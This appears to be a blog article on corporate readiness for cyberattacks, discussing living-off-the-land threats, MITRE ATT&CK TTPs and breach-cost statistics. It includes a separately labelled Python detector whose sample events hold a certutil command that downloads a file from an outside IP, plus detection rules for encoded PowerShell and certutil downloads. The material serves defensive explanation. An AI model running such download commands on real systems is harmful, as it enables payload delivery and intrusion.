Are companies ready for the next attack?

Ozan Ozkara
Published in Nerd For Tech
Dec 11, 2019, 4 min read

Today’s business ecosystems rely heavily on mixed on-premises and cloud-based infrastructures. Environmental drift and external pressures push organizations toward more agile security, while at the same time they need more ways of accessing more resources.

Security teams may be blind, or stretched thin managing too many tools in their environments, unable to identify adversarial behavior in real time and struggling to map their current risk profile. On top of that, the cybersecurity skills shortage has grown over the years and remains a prominent problem for organizations. To close this gap, organizations turn to security consultancy services such as penetration tests and similar activities, performed regularly but not continuously. Despite the high cost of these efforts, adversaries frequently bypass an organization’s security stack and undermine the integrity of its security.

In recent years, adversarial campaigns and cybercriminal activity have advanced with new techniques and tactics. The old model, in which company assets are isolated behind a security stack, is behind us. Gone are the days of a static stack of applications. The current environment involves a wide variety of apps, services, users, data in motion and data at rest, all of which require protection. A layered security stack that is validated against a variety of technologies and keeps up with changes in the threat landscape will be crucial in tackling this wide variety of threats. Testing methods like penetration testing and red teaming help in practice but remain unsuccessful against the attacks we see today.

New risks and techniques will inevitably emerge. The increased adoption of the cloud and the influence of third parties and suppliers raise risk at every layer. Additional factors such as human error, the skills shortage, and misconfiguration of technologies, without fact-based threat data, create ample opportunity for compromise to spread exponentially across networks.

As a consequence of all these factors, connected assets and networks generate more incidents that leave doors unlocked to real threats and breaches. Business threats will be no less complex when organizations combine common risks with a variety of technologies.

Through the Looking Glass

Implementing a security context is generally done with a vendor’s threat data: the CTI or red team goes through this process manually, works with the prevention team, and applies the context they are building to products. Note that in both cases it is not continuous, and it depends heavily on human effort and safety checks. Given the speed and complexity of threats, this is not sustainable in any respect.

Understanding the adversarial mindset is not just a technical matter; it can be good guidance for revealing attackers’ behavior, including their likely choices of tools, tactics, and procedures.

Organizations are going to be attacked with whatever exploit kits and techniques work in the wild. The tension between defenders, relying on cybersecurity experience and the authority to protect their networks, and attackers continues to grow.

In the cases mentioned above, the usual intelligence context, not grounded in facts, does not reduce the occurrence of vulnerabilities or close the gaps that exist in the security stack. We predict more threat actors targeting critical data, and more breaches are to be expected as business software, networks, and cloud-centric platforms are widely adopted. The more corporate data resides in the cloud, the more interested threat actors become.

Is it Defensible?

Organizations can still be at risk despite patching systems regularly and assessing their risk level all the time.

Contrary to popular myth, threats can operate in short time intervals, so attackers must continually update their techniques in order to avoid detection. For this reason, threat-centric security controls that are not implemented properly will have a tremendous impact on an organization’s assets. Threats that take a ‘live off the land’ approach will continue to bypass traditional blacklisting techniques. Organizations will have to consider solutions such as UEBA, SIEMs, sandboxing, and traffic anomaly monitoring. These products can help in particular areas, but they do not provide the whole picture of the kill chain, so the attack escalation steps are always missing from the table.

The cybersecurity threat landscape continues to grow as attacks, techniques, and adversaries execute series of actions that bypass detection technologies efficiently. Moreover, adversaries rarely use a single vector anymore. They blend various tactics and complex techniques to fulfill their goals. Tactics, Techniques, and Procedures (TTPs) represent the behavior of adversarial action. In this context, tactics are the high-level classification of adversarial actions. Techniques are descriptions of the actions used to achieve a particular tactic. Procedures describe how an adversary will carry out their kill chain to perform their objective.

These could be details of targeted attacks such as ransom emails or spearphishing attacks: whom they target, and whether the malicious action involves a link or an attachment. This is hard to grasp; only security subject matter experts can understand criminal actions and behavior and how particular attack flows are orchestrated.

A detailed understanding of TTPs offers excellent insight into adversaries’ mind map; even single atomic techniques can help organizations understand, prepare for, respond to, and mitigate imminent threats. The MITRE ATT&CK framework is an open and excellent knowledge base that classifies adversarial tactics and techniques based on real-world observations.
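As an added example, not code from the article or from MITRE: a small Python detector that contrasts a hash blacklist with behavior rules tagged with ATT&CK tactic and technique IDs, run over constructed process-creation events. The events, hashes and rule set are illustrative assumptions; the technique IDs are real ATT&CK identifiers.

```python
import re
from dataclasses import dataclass
from typing import Callable

# Constructed sample process-creation events (not real telemetry);
# every image is a signed OS component, so the hashes are placeholders.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmd": "winword.exe invoice.docm", "sha256": "HASH_WINWORD"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -EncodedCommand <base64>", "sha256": "HASH_POWERSHELL"},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmd": "notepad.exe notes.txt", "sha256": "HASH_NOTEPAD"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmd": "certutil.exe -urlcache -f http://203.0.113.5/x x", "sha256": "HASH_CERTUTIL"},
]

# A blacklist only knows hashes of previously seen malware. Living-off-the-land
# activity reuses built-in binaries, so none of the events above can match.
MALWARE_HASH_BLACKLIST = {"HASH_OF_KNOWN_MALWARE_SAMPLE"}

def blacklist_detect(events):
    return [e for e in events if e["sha256"] in MALWARE_HASH_BLACKLIST]

@dataclass
class Rule:
    name: str
    tactic: str         # ATT&CK tactic (the adversary's high-level goal)
    technique: str      # ATT&CK technique ID (how the goal is achieved)
    match: Callable[[dict], object]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Behavior rules describe the observed procedure rather than a file identity.
RULES = [
    Rule("office app spawning a script host", "Execution", "T1204.002",
         lambda e: e["parent"] in OFFICE and e["image"] in SCRIPT_HOSTS),
    Rule("encoded PowerShell command line", "Execution", "T1059.001",
         lambda e: e["image"] == "powershell.exe"
         and re.search(r"\s-(e|ec|enc|encodedcommand)\s", e["cmd"], re.I)),
    Rule("certutil used as a downloader", "Command and Control", "T1105",
         lambda e: e["image"] == "certutil.exe" and "-urlcache" in e["cmd"].lower()),
]

def behavior_detect(events):
    """Return (image, tactic, technique, rule name) for every rule hit."""
    return [(e["image"], r.tactic, r.technique, r.name)
            for e in events for r in RULES if r.match(e)]
```

Running both detectors over the same events shows the blacklist staying silent while the behavior rules surface three hits, each already mapped to the tactic and technique an analyst would look up in ATT&CK.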

The lifecycle of a data breach has emerged

A data breach is described as an incident in which an individual’s name or a financial record is possibly put at risk. In general, data breaches are attributed to three leading causes:

  • a malicious, threat-actor-motivated targeted criminal attack,
  • a system glitch,
  • or human error.

The costs of a data breach vary; they depend on the threat profile and the defenses in place at the time of the breach. Malicious attacks are the most common and most expensive root cause of breaches.

Since 2014, malicious attacks have surged by 21%, rising from 42% of breaches in 2014 to 51% of breaches in 2019. They were considerably harder to identify and contain: their breach lifecycle was 12.5% longer than the average breach lifecycle of 279 days. These findings help explain why breaches caused by a malicious attack were 27% more expensive than breaches caused by human error ($4.45 million vs. $3.5 million) and 37% more expensive than breaches caused by system glitches ($4.45 million vs. $3.24 million). (IBM/Ponemon 2019 Cost of a Data Breach Report)

Cofounder of ArcaneBT, Cyber Security Pro and Thinker, Wing Tsun/Escrima Sihing.